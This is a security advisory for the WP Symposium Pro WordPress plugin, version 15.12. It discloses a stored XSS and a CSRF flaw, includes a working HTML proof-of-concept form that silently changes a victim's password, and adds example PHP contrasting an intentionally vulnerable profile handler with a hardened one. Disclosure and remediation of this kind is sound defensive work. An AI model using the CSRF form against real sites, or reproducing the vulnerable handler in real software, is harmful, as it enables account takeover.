#Product: WP Symposium Pro Social Network plugin
#Exploit Author: Rahul Pratap Singh
#Home page Link: https://wordpress.org/plugins/wp-symposium-pro
#Version: 15.12
#Website : 0x62626262.wordpress.com
#Twitter : @0x62626262
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date: 8/Jan/2016

1) XSS Vulnerability:

Vulnerable Code:
file: wps_usermeta_shortcodes.php

The "wpspro_country" parameter is not sanitized before it is stored in the user's profile, and the stored value is later rendered back to the page, which leads to persistent (stored) XSS.

Video Demonstration:
https://www.youtube.com/watch?v=Xglc3rNZPXs

2) CSRF Vulnerability:

Description:
The edit-profile page processes the profile update without verifying a request token, and it accepts a new password without asking for the current one. A logged-in user who loads an attacker-controlled page containing the form below therefore has their password changed silently, which leads to full account takeover.

Exploit:

<html>
  <body>
    <form action="http://localhost/wp422/wordpress/index.php/edit-profile/" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="wps_usermeta_change_update" value="yes" />
      <input type="hidden" name="wpspro_display_name" value="rahul" />
      <input type="hidden" name="wpspro_firstname" value="hello1" />
      <input type="hidden" name="wpspro_lastname" value="hello2" />
      <input type="hidden" name="wpspro_email" value=" " />
      <input type="hidden" name="wpsro_home" value="hello4" />
      <input type="hidden" name="wpspro_country" value="hello5" />
      <input type="hidden" name="wpspro_password" value="asdf" />
      <input type="hidden" name="wpspro_password2" value="asdf" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Video Demonstration:
https://www.youtube.com/watch?v=sN65HlCRe9c

Fix:
Update to version 16.1

Disclosure Timeline:
reported to vendor: 6/1/2016
vendor response : 6/1/2016
vendor acknowledged : 6/1/2016
vendor scheduled a patch: 7/1/2016

CVE Number : Not assigned yet
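Both findings above come from the same handler shape: a profile-update routine that trusts POST data without a request token and stores it without sanitization. The following is an added example, not the plugin's source and not the vendor's patch; it shows a minimal WordPress handler written the way the advisory describes the vulnerable behaviour, next to a hardened form using the standard WordPress nonce, sanitization and escaping APIs. The function names prefixed wpspro_example_, the nonce action name and the wpspro_current_password field are assumptions made for the example; only the wp_* / sanitize_* / esc_* calls are real WordPress API.

```php
<?php
// Added example (not WP Symposium Pro code). Function names prefixed
// wpspro_example_, the nonce action 'wpspro_update_profile' and the field
// 'wpspro_current_password' are assumptions for illustration only.

// --- Pattern the advisory describes: no token check, no sanitization ---
function wpspro_example_update_profile_vulnerable() {
    if ( ! is_user_logged_in() || empty( $_POST['wps_usermeta_change_update'] ) ) {
        return;
    }
    $user_id = get_current_user_id();

    // CSRF: nothing ties this POST to a form the user actually rendered, so a
    // third-party page can submit it with the victim's cookies.
    // Stored XSS: the raw value is saved and later echoed unescaped.
    update_user_meta( $user_id, 'wpspro_country', $_POST['wpspro_country'] );

    // Account takeover: a new password is accepted with no current-password check.
    if ( ! empty( $_POST['wpspro_password'] )
        && $_POST['wpspro_password'] === $_POST['wpspro_password2'] ) {
        wp_set_password( $_POST['wpspro_password'], $user_id );
    }
}

// --- Hardened form ---
function wpspro_example_render_form_fields() {
    // Emits <input type="hidden" name="wpspro_nonce" value="..."> bound to the
    // action name and the current user's session.
    wp_nonce_field( 'wpspro_update_profile', 'wpspro_nonce' );
    echo '<input type="password" name="wpspro_current_password" />';
    // ... remaining profile fields ...
}

function wpspro_example_update_profile_hardened() {
    if ( ! is_user_logged_in() || empty( $_POST['wps_usermeta_change_update'] ) ) {
        return;
    }

    // 1. CSRF: reject any request without a valid nonce for this action.
    //    A cross-site attacker cannot read the nonce, so the PoC form fails here.
    if ( empty( $_POST['wpspro_nonce'] )
        || ! wp_verify_nonce( $_POST['wpspro_nonce'], 'wpspro_update_profile' ) ) {
        wp_die( 'Invalid request.', 'Error', array( 'response' => 403 ) );
    }
    $user_id = get_current_user_id();

    // 2. Stored XSS: sanitize on input (strip tags, control chars, slashes)...
    $country = sanitize_text_field( wp_unslash( $_POST['wpspro_country'] ?? '' ) );
    update_user_meta( $user_id, 'wpspro_country', $country );

    // 3. Password change: demand the current password as a second factor
    //    against a stolen session or a token check that is ever bypassed.
    if ( ! empty( $_POST['wpspro_password'] ) ) {
        $user = wp_get_current_user();
        if ( empty( $_POST['wpspro_current_password'] )
            || ! wp_check_password( $_POST['wpspro_current_password'], $user->user_pass, $user_id ) ) {
            wp_die( 'Current password is incorrect.', 'Error', array( 'response' => 403 ) );
        }
        if ( $_POST['wpspro_password'] !== ( $_POST['wpspro_password2'] ?? null ) ) {
            wp_die( 'Passwords do not match.', 'Error', array( 'response' => 400 ) );
        }
        wp_set_password( $_POST['wpspro_password'], $user_id );
    }
}

// ... and escape on output regardless of what was stored, so a value that
// slipped in before the fix (or through another code path) is still inert.
function wpspro_example_show_country( $user_id ) {
    return esc_html( get_user_meta( $user_id, 'wpspro_country', true ) );
}
```

Two caveats a reviewer would raise: sanitize_text_field on input is defence in depth, not a substitute for esc_html at the point of output, because the same meta value may be rendered in several places and a later code path may store it unsanitized; and a WordPress nonce is a per-user, time-limited token rather than a per-request one, which is sufficient to stop the cross-site form above but should be paired with the current-password check so that a single missing verify call never again equals account takeover.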